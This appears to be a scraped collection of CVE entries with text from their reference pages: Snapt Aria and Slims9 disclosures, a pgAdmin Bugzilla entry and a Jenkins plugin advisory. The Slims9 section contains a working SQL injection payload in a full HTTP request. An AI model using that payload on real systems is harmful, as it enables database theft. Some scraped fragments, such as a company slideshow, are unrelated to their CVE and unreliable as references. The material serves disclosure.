The Simple Membership WordPress plugin before 4.1.0 does not have CSRF check in place when deleting Transactions, which could allow attackers to make a logged in admin delete arbitrary transactions via a CSRF attack

CVE-2022-0681

Cross-Site Request Forgery (CSRF) in GitHub repository crater-invoice/crater prior to 6.0.4.

CVE-2022-0515

The Advanced Contact form 7 DB WordPress plugin before 1.8.7 does not have authorisation nor CSRF checks in the acf7_db_edit_scr_file_delete AJAX action, and does not validate the file to be deleted, allowing any authenticated user to delete arbitrary files on the web server. For example, removing the wp-config.php allows attackers to trigger WordPress setup again, gain administrator privileges and execute arbitrary code or display arbitrary content to the users.

CVE-2021-24905

The miniOrange's Google Authenticator WordPress plugin before 5.5 does not have proper authorisation and CSRF checks when handling the reconfigureMethod, and does not validate the parameters passed to it properly. As a result, unauthenticated users could delete arbitrary options from the blog, making it unusable.

CVE-2022-0229

The snaptPowered2 component of Snapt Aria v12.8 was discovered to contain a command injection vulnerability. This vulnerability allows authenticated attackers to execute arbitrary commands.

**Mitre Reference:**

**CVE-2022-24235**

**Vulnerability Type:** Cross Site Request Forgery (CSRF)  
**Affected Product Code Base:** Snapt Aria - 12.8  
**Affected Component:** Snapt Aria management portal  
**Description:** A Cross-Site Request Forgery (CSRF) in the management portal of Snapt Aria v12.8 allows attackers to escalate privileges and execute arbitrary code via unspecified vectors.  
**Attack Vectors:** An authenticated user must click on a malicious link which hosts the CSRF payload.  
**Attack Type:** Remote  
**Impact Code execution:** true  
**Impact Escalation of Privileges:** true  
**Impact Information Disclosure:** true

**CVE-2022-24236**

**Vulnerability Type:** Insecure Permissions  
**Affected Product Code Base:** Snapt Aria - 12.8  
**Affected Component:** Snapt Aria management portal, email configuration  
**Description:** An insecure permissions vulnerability in Snapt Aria v12.8 allows unauthenticated attackers to send e-mails from spoofed users’ accounts.  
**Attack Vectors:** Exploitation occurs through a maliciously crafted “Test Email” request, utilizing an unprivileged authentication token.  
**CVE Impact Other:** Impersonation  
**Attack Type:** Remote  
**Impact Escalation of Privileges:** true

**CVE-2022-24237**

**VulnerabilityType Other:** Authenticated Command Injection  
**Affected Product Code Base:** Snapt Aria - 12.8  
**Affected Component:** Snapt Aria management portal, default snaptPowered2 component  
**Description:** The snaptPowered2 component of Snapt Aria v12.8 was discovered to contain a command injection vulnerability. This vulnerability allows authenticated attackers to execute arbitrary commands.  
**Attack Vectors:** Exploitation occurs though command injection of snaptPowered2 configuration requests.  
**Attack Type:** Remote  
**Impact Code execution:** true  
**Impact Escalation of Privileges:** true  
**Impact Information Disclosure:** true

**Timeline:**

**01/28/22** - initial contact disclosure  
**01/31/22** - vendor initial response  
**02/07/22** - vendor patch (CVE-2022-24237, CVE-2022-24236, CVE-2022-24235)  
**02/24/22** - vendor last contact

CVE-2022-24237: Snapt Aria 12.8 Vulnerability Disclosure

A CSRF issue in /api/crontab on iRZ Mobile Routers through 2022-03-16 allows a threat actor to create a crontab entry in the router administration panel. The cronjob will consequently execute the entry on the threat actor's defined interval, leading to remote code execution, allowing the threat actor to gain filesystem access. In addition, if the router's default credentials aren't rotated or a threat actor discovers valid credentials, remote code execution can be achieved without user interaction.

![Slide background](https://en.irz.ru/uploads/images/slides/601.jpg) oDAS RADIUS GSM-R, LTE, UMTS, and GSM coverage  
along railways, roads and rural areas More

![Slide background](https://en.irz.ru/uploads/images/slides/505.jpg) Power electronics  
for electric vehicles traction inverters,  
power converters… More

![Slide background](https://en.irz.ru/uploads/images/slides/011.jpg) Since 1962 —  
working in rocket and  
space industry Equipment

![Slide background](https://en.irz.ru/uploads/images/slides/015.jpg) Since 1989 —  
designing and manufacturing  
communication equipment Equipment

![Slide background](https://en.irz.ru/uploads/images/slides/020.jpg) Since 1993 —  
working in railway industry Equipment

![Slide background](https://en.irz.ru/uploads/images/slides/003.jpg) Since 1999 —  
designing and manufacturing  
oilfield equipment Equipment

CVE-2022-27226: Izhevskiy radiozavod

Slims9 Bulian 9.4.2 is affected by SQL injection in lib/comment.inc.php. User data can be obtained.

SQL injection exists in the lib/comment.inc.php file. There is no effective defense against the comment field, leading to SQL injection attacks.  
Ordinary user login "find a book" SQL injection attack in the comments (example:`'and/**/1=(updatexml(1,concat(0x3a,(select/**/user())),1) )/**/and/**/'1'='1`  
)  
![5](https://user-images.githubusercontent.com/18564938/147071549-90380ba8-eeeb-4bb7-86b0-718de1df0f22.png)  
![6](https://user-images.githubusercontent.com/18564938/147071593-bc47a5f7-f068-4c76-b424-a02c954c7eb4.png)

\`SQL Injection request:  
POST /index.php?p=show\_detail&id=17 HTTP/1.1  
Host: 192.168.31.63  
Content-Length: 110  
Cache-Control: max-age=0  
Origin: http://192.168.31.63  
Upgrade-Insecure-Requests: 1  
DNT: 1  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3; q=0.9  
Referer: http://192.168.31.63/index.php?p=show\_detail&id=17  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: admin\_logged\_in=1; ckCsrfToken=QlUPE9DlsBjESqNjH6x7Mb9y7y7cIl24Tq13u7c6; SenayanMember=do2fk5pq9qdkqo1phadksnm0u9  
Connection: close

comment='and/**/1=(updatexml(1,concat(0x3a,(select/**/user())),1))/**/and/**/'1'='1  
&SaveComment=Save+comment\`

\`Vulnerable code:  
$\_sql = "Select c.comment, m.member\_name, c.input\_date from comment AS c  
LEFT JOIN biblio AS b ON b.biblio\_id = c.biblio\_id  
LEFT JOIN member AS m ON m.member\_id = c.member\_id  
WHERE b.biblio\_id =".$\_detail\_id.  
"ORDER BY c.last\_update DESC";  
$commlist = $dbs->query($\_sql);  
if ($commlist) {  
$\_all\_recs = $commlist->num\_rows;  
}  
if ($\_all\_recs >0) {  
$\_page = ($page -1) \* $\_recs\_each\_page;  
$\_sql .= "Limit". $\_page. ", ". $\_recs\_each\_page;  
$commlist = $dbs->query($\_sql);  
$\_list\_comment .='

'. $\_all\_recs. \_\_(' comments available').'

';  
while ($\_data = $commlist->fetch\_assoc()) {  
$\_list\_comment .='

';  
$\_list\_comment .='

'.$\_data\['member\_name'\]. \_\_(' at'). $\_data\['input\_date'\]. \_\_(' write').'</ div>';  
$\_list\_comment .='

'. $\_data\['comment'\].'

';  
$\_list\_comment .='

';  
}  
$\_list\_comment .='

'.simbio\_paging::paging($\_all\_recs, $\_recs\_each\_page, $int\_pages\_each\_set = 10,'','\_self').'

';  
}

if (ISSET($\_SESSION\['mid'\])) {  
// Comment form  
$\_forms ='

';  
$\_forms .= simbio\_form\_element::textField('textarea','comment','','placeholder="Add your comment" class="comment-input form-control"').'  
';  
$\_forms .='';  
$\_forms .= \\Volnix\\CSRF\\CSRF::getHiddenInputString();  
$\_forms .='';  
return $\_list\_comment.$\_forms;\`

CVE-2021-45793: [Security Bugs] Sql Injection · Issue #123 · slims/slims9_bulian

A malicious, but authorised and authenticated user can construct an HTTP request using their existing CSRF token and session cookie to manually upload files to any location that the operating system user account under which pgAdmin is running has permission to write.

'2063759?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2022-0959: Invalid Bug ID

When run in server mode, pgAdmin 4 allows users to store files on the server under individual storage directories. Files such as SQL scripts may be uploaded through the user interface. The URI to which upload requests are made fails to validate the upload path to prevent path traversal techniques being used to store files outside of the storage directory. A malicious, but authorised and authenticated user can construct an HTTP request using their existing CSRF token and session cookie to manually upload files to any location that the operating system user account under which pgAdmin is running has permission to write.

Description Sandipan Roy 2022-03-14 10:50:12 UTC

Vulnerable versions: All prior to v6.7.

When run in server mode, pgAdmin 4 allows users to store files on the
server under individual storage directories. Files such as SQL scripts may
be uploaded through the user interface. The URI to which upload requests
are made fails to validate the upload path to prevent path traversal
techniques being used to store files outside of the storage directory. A
malicious, but authorised and authenticated user can construct an HTTP
request using their existing CSRF token and session cookie to manually
upload files to any location that the operating system user account under
which pgAdmin is running has permission to write.

This issue does not affect users running pgAdmin in desktop mode.

Comment 3 David Kaufmann 2022-03-14 16:05:53 UTC

should this affect pgadmin3? it looks a lot like only the re-implementation pgadmin4 is affected - pgadmin3 doesn't seem to have a server mode, or to use http at all.

Comment 4 Product Security DevOps Team 2022-03-14 17:01:59 UTC

This CVE Bugzilla entry is for community support informational purposes only as it does not affect a package in a commercially supported Red Hat product. Refer to the dependent bugs for status of those individual community products.

CVE-2022-0959: Unrestricted file upload in pgAdmin

Jenkins Extended Choice Parameter Plugin 346.vd87693c5a_86c and earlier allows attackers with Item/Configure permission to read values from arbitrary JSON and Java properties files on the Jenkins controller.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   AWS Credentials Plugin
*   Dashboard View Plugin
*   dbCharts Plugin
*   Environment Dashboard Plugin
*   Extended Choice Parameter Plugin
*   Favorite Plugin
*   Folder-based Authorization Strategy Plugin
*   GitLab Authentication Plugin
*   global-build-stats Plugin
*   incapptic connect uploader Plugin
*   kubernetes-cd Plugin
*   List Git Branches Parameter Plugin
*   Parameterized Trigger Plugin
*   Release Helper Plugin
*   Semantic Versioning Plugin
*   Vmware vRealize CodeStream Plugin

**Descriptions****Sensitive parameter values captured in build metadata files by Parameterized Trigger Plugin**

**SECURITY-2185 / CVE-2022-27195**  
**Severity (CVSS):** Low  
**Affected plugin: parameterized-trigger**  
**Description:**

Parameterized Trigger Plugin 2.43 and earlier captures environment variables passed to builds triggered using Parameterized Trigger Plugin, including password parameter values, in their build.xml files. These values are stored unencrypted and can be viewed by users with access to the Jenkins controller file system.

Parameterized Trigger Plugin 2.43.1 does not store captured environment variables in build.xml files.

Existing build.xml files are not automatically updated to remove captured environment variables. They need to be manually cleaned up. To help with this, the plugin will report environment variables stored in build.xml as unloadable data in the Old Data Monitor, that allows discarding this data. Build records are only loaded from disk when needed however, so some builds stored in Jenkins may not immediately appear there.

**Stored XSS vulnerability in Favorite Plugin**

**SECURITY-2557 / CVE-2022-27196**  
**Severity (CVSS):** High  
**Affected plugin: favorite**  
**Description:**

Favorite Plugin 2.4.0 and earlier does not escape the names of jobs in the favorite column.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure or Item/Create permissions.

Favorite Plugin 2.4.1 escapes the names of jobs in the favorite column.

**Stored XSS vulnerability in Dashboard View Plugin**

**SECURITY-2559 / CVE-2022-27197**  
**Severity (CVSS):** High  
**Affected plugin: dashboard-view**  
**Description:**

Dashboard View Plugin 2.18 and earlier does not perform URL validation for the Iframe Portlet’s Iframe source URL.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure views.

Dashboard View Plugin 2.18.1 performs URL validation for the Iframe Portlet’s Iframe source URL.

Additionally, Dashboard View Plugin 2.18.1 sets the sandbox attribute for the iframe to restrict the included page.

In case of problems, the Java system property hudson.plugins.view.dashboard.core.IframePortlet.sandboxAttributeValue can be used to customize the sandbox attribute value. The Java system property hudson.plugins.view.dashboard.core.IframePortlet.doNotUseSandbox can be used to disable the sandbox completely.

**CSRF vulnerability and missing permission checks in AWS Credentials Plugin**

**SECURITY-2351 / CVE-2022-27198 (CSRF), CVE-2022-27199 (permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: aws-credentials**  
**Description:**

AWS Credentials Plugin 189.v3551d5642995 and earlier does not perform a permission check in a method implementing form validation.

This allows attackers with Overall/Read permission to connect to an AWS service using an attacker-specified token.

Additionally, this form validation method does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

This form validation method requires POST requests and Overall/Administer permission in AWS Credentials Plugin 191.vcb\_f183ce58b\_9.

**Stored XSS vulnerability in Folder-based Authorization Strategy Plugin**

**SECURITY-2646 / CVE-2022-27200**  
**Severity (CVSS):** Medium  
**Affected plugin: folder-auth**  
**Description:**

Folder-based Authorization Strategy Plugin 1.3 and earlier does not escape the names of roles shown on the configuration form.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Overall/Administer permission.

Folder-based Authorization Strategy Plugin 1.4 escapes the names of roles shown on the configuration form.

**Agent-to-controller security bypass in Semantic Versioning Plugin**

**SECURITY-2124 / CVE-2022-27201**  
**Severity (CVSS):** High  
**Affected plugin: semantic-versioning-plugin**  
**Description:**

Semantic Versioning Plugin defines a controller/agent message that processes a given file as XML and returns version information. The XML parser is not configured to prevent XML external entity (XXE) attacks, which is only a problem if XML documents are parsed on the Jenkins controller.

Semantic Versioning Plugin 1.13 and earlier does not restrict execution of the controller/agent message to agents, and implements no limitations about the file path that can be parsed. This allows attackers able to control agent processes to have Jenkins parse a crafted file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

This vulnerability is only exploitable in Jenkins 2.318 and earlier, LTS 2.303.2 and earlier. See the LTS upgrade guide.

Semantic Versioning Plugin 1.14 does not allow the affected controller/agent message to be submitted by agents for execution on the controller.

**Stored XSS vulnerability in Extended Choice Parameter Plugin**

**SECURITY-2232 / CVE-2022-27202**  
**Severity (CVSS):** High  
**Affected plugin: extended-choice-parameter**  
**Description:**

Extended Choice Parameter Plugin 346.vd87693c5a\_86c and earlier does not escape the value and description of Extended Choice Parameters with parameter type 'Radio Buttons' or 'Check Boxes'.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.

**Arbitrary JSON and property file read vulnerability in Extended Choice Parameter Plugin**

**SECURITY-1351 / CVE-2022-27203**  
**Severity (CVSS):** Medium  
**Affected plugin: extended-choice-parameter**  
**Description:**

Extended Choice Parameter Plugin 346.vd87693c5a\_86c and earlier allows attackers with Item/Configure permission to read values from arbitrary JSON and Java properties files on the Jenkins controller.

**CSRF vulnerability and missing permission checks in Extended Choice Parameter Plugin allow SSRF**

**SECURITY-1350 / CVE-2022-27204 (CSRF), CVE-2022-27205 (permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: extended-choice-parameter**  
**Description:**

Extended Choice Parameter Plugin 346.vd87693c5a\_86c and earlier does not perform a permission check on form validation methods. This allows attackers with Overall/Read permission to connect to an attacker-specified URL.

Additionally, these form validation methods do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

**Client Secret stored in plain text by GitLab Authentication Plugin**

**SECURITY-1891 / CVE-2022-27206**  
**Severity (CVSS):** Low  
**Affected plugin: gitlab-oauth**  
**Description:**

GitLab Authentication Plugin 1.13 and earlier stores the GitLab client secret unencrypted in the global config.xml file on the Jenkins controller as part of its configuration.

This client secret can be viewed by users with access to the Jenkins controller file system.

**Stored XSS vulnerability in global-build-stats Plugin**

**SECURITY-1886 / CVE-2022-27207**  
**Severity (CVSS):** Medium  
**Affected plugin: global-build-stats**  
**Description:**

global-build-stats Plugin 1.5 and earlier does not escape multiple fields in the chart configuration on the 'Global Build Stats' page.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Overall/Administer permission.

**Arbitrary file read vulnerability in kubernetes-cd Plugin**

**SECURITY-2096 / CVE-2022-27208**  
**Severity (CVSS):** Medium  
**Affected plugin: kubernetes-cd**  
**Description:**

kubernetes-cd Plugin contributes the 'Kubernetes configuration (kubeconfig)' credential type.

kubernetes-cd Plugin 2.3.1 and earlier allows users with Credentials/Create or Credentials/Update permission to read arbitrary files on the Jenkins controller by defining a 'From a file on the Jenkins master' Kubeconfig source for such a credential.

**Missing permission checks in kubernetes-cd Plugin allow enumerating credentials IDs**

**SECURITY-2636 / CVE-2022-27209**  
**Severity (CVSS):** Medium  
**Affected plugin: kubernetes-cd**  
**Description:**

kubernetes-cd Plugin 2.3.1 and earlier does not perform permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.

**CSRF vulnerability and missing permission checks in kubernetes-cd Plugin allow capturing credentials**

**SECURITY-2681 / CVE-2022-27210 (CSRF), CVE-2022-27211 (permission check)**  
**Severity (CVSS):** High  
**Affected plugin: kubernetes-cd**  
**Description:**

kubernetes-cd Plugin 2.3.1 and earlier does not perform a permission check in an HTTP endpoint.

This allows attackers with Overall/Read permission to connect to an attacker-specified SSH server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Additionally, this endpoint does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

**Stored XSS vulnerability in List Git Branches Parameter Plugin**

**SECURITY-2167 / CVE-2022-27212**  
**Severity (CVSS):** High  
**Affected plugin: list-git-branches-parameter**  
**Description:**

List Git Branches Parameter Plugin 0.0.9 and earlier does not escape the name or default value of the 'List Git branches (and more)' parameter. Additionally, List Git Branches Parameter Plugin explicitly disables a protection mechanism introduced in Jenkins 2.44 and LTS 2.32.2 to prevent exploitation of unescaped parameter names.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.

**Stored XSS vulnerability in Environment Dashboard Plugin**

**SECURITY-2252 / CVE-2022-27213**  
**Severity (CVSS):** High  
**Affected plugin: environment-dashboard**  
**Description:**

Environment Dashboard Plugin 1.1.10 and earlier does not escape the Environment order and the Component order configuration values in its views.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with View/Configure permission.

**CSRF vulnerability and missing permission checks in Release Helper Plugin**

**SECURITY-2274 / CVE-2022-27214 (CSRF), CVE-2022-27215 (permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: release-helper**  
**Description:**

Release Helper Plugin 1.3.3 and earlier does not perform a permission check in a method implementing form validation.

This allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified username and password.

Additionally, this form validation method does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

**Passwords stored in plain text by dbCharts Plugin**

**SECURITY-2159 / CVE-2022-27216**  
**Severity (CVSS):** Low  
**Affected plugin: dbCharts**  
**Description:**

dbCharts Plugin 0.5.2 and earlier stores JDBC connection passwords unencrypted in its global configuration file hudson.plugins.dbcharts.DbChartPublisher.xml on the Jenkins controller as part of its configuration.

These passwords can be viewed by users with access to the Jenkins controller file system.

**Passwords stored in plain text by Vmware vRealize CodeStream Plugin**

**SECURITY-2238 / CVE-2022-27217**  
**Severity (CVSS):** Medium  
**Affected plugin: vmware-vrealize-codestream**  
**Description:**

Vmware vRealize CodeStream Plugin 1.2 and earlier stores passwords unencrypted in job config.xml files on the Jenkins controller as part of its configuration.

These passwords can be viewed by users with Item/Extended Read permission or access to the Jenkins controller file system.

**Personal tokens stored in plain text by incapptic connect uploader Plugin**

**SECURITY-2273 / CVE-2022-27218**  
**Severity (CVSS):** Medium  
**Affected plugin: incapptic-connect-uploader**  
**Description:**

incapptic connect uploader Plugin 1.15 and earlier stores personal tokens unencrypted in job config.xml files on the Jenkins controller as part of its configuration.

These tokens can be viewed by users with Item/Extended Read permission or access to the Jenkins controller file system.

**Severity**

*   SECURITY-1350: Medium
*   SECURITY-1351: Medium
*   SECURITY-1886: Medium
*   SECURITY-1891: Low
*   SECURITY-2096: Medium
*   SECURITY-2124: High
*   SECURITY-2159: Low
*   SECURITY-2167: High
*   SECURITY-2185: Low
*   SECURITY-2232: High
*   SECURITY-2238: Medium
*   SECURITY-2252: High
*   SECURITY-2273: Medium
*   SECURITY-2274: Medium
*   SECURITY-2351: Medium
*   SECURITY-2557: High
*   SECURITY-2559: High
*   SECURITY-2636: Medium
*   SECURITY-2646: Medium
*   SECURITY-2681: High

**Affected Versions**

*   **AWS Credentials Plugin** up to and including 189.v3551d5642995
*   **Dashboard View Plugin** up to and including 2.18
*   **dbCharts Plugin** up to and including 0.5.2
*   **Environment Dashboard Plugin** up to and including 1.1.10
*   **Extended Choice Parameter Plugin** up to and including 346.vd87693c5a\_86c
*   **Favorite Plugin** up to and including 2.4.0
*   **Folder-based Authorization Strategy Plugin** up to and including 1.3
*   **GitLab Authentication Plugin** up to and including 1.13
*   **global-build-stats Plugin** up to and including 1.5
*   **incapptic connect uploader Plugin** up to and including 1.15
*   **kubernetes-cd Plugin** up to and including 2.3.1
*   **List Git Branches Parameter Plugin** up to and including 0.0.9
*   **Parameterized Trigger Plugin** up to and including 2.43
*   **Release Helper Plugin** up to and including 1.3.3
*   **Semantic Versioning Plugin** up to and including 1.13
*   **Vmware vRealize CodeStream Plugin** up to and including 1.2

**Fix**

*   **AWS Credentials Plugin** should be updated to version 191.vcb\_f183ce58b\_9
*   **Dashboard View Plugin** should be updated to version 2.18.1
*   **Favorite Plugin** should be updated to version 2.4.1
*   **Folder-based Authorization Strategy Plugin** should be updated to version 1.4
*   **Parameterized Trigger Plugin** should be updated to version 2.43.1
*   **Semantic Versioning Plugin** should be updated to version 1.14

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   dbCharts Plugin
*   Environment Dashboard Plugin
*   Extended Choice Parameter Plugin
*   GitLab Authentication Plugin
*   global-build-stats Plugin
*   incapptic connect uploader Plugin
*   kubernetes-cd Plugin
*   List Git Branches Parameter Plugin
*   Release Helper Plugin
*   Vmware vRealize CodeStream Plugin

Learn why we announce these issues.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Daniel Beck, CloudBees, Inc.** for SECURITY-2124, SECURITY-2681
*   **Gunther Rademacher** for SECURITY-2185
*   **Jesse Glick, CloudBees, Inc.** for SECURITY-2096
*   **Justin Philip** for SECURITY-2252
*   **Kevin Guerroudj** for SECURITY-2232, SECURITY-2238
*   **Kevin Guerroudj, CloudBees, Inc.** for SECURITY-2636, SECURITY-2646
*   **Kevin Guerroudj, CloudBees, Inc. and Wadeck Follonier, CloudBees, Inc.** for SECURITY-2557
*   **Matt Sicker, CloudBees, Inc. and, independently, Marc Heyries** for SECURITY-1891
*   **Oleg Nenashev, CloudBees, Inc.** for SECURITY-1350, SECURITY-1351
*   **Quentin Parra** for SECURITY-2273, SECURITY-2274
*   **Son Nguyen (@s0nnguy3n\_)** for SECURITY-2159
*   **Son Nguyen (@s0nnguy3n\_), and, independently, Kevin Guerroudj** for SECURITY-2167
*   **Wadeck Follonier, CloudBees, Inc. and Kevin Guerroudj, CloudBees, Inc.** for SECURITY-2559
*   **Wadeck Follonier, CloudBees, Inc., and, independently, Kevin Guerroudj** for SECURITY-1886

Tag

#csrf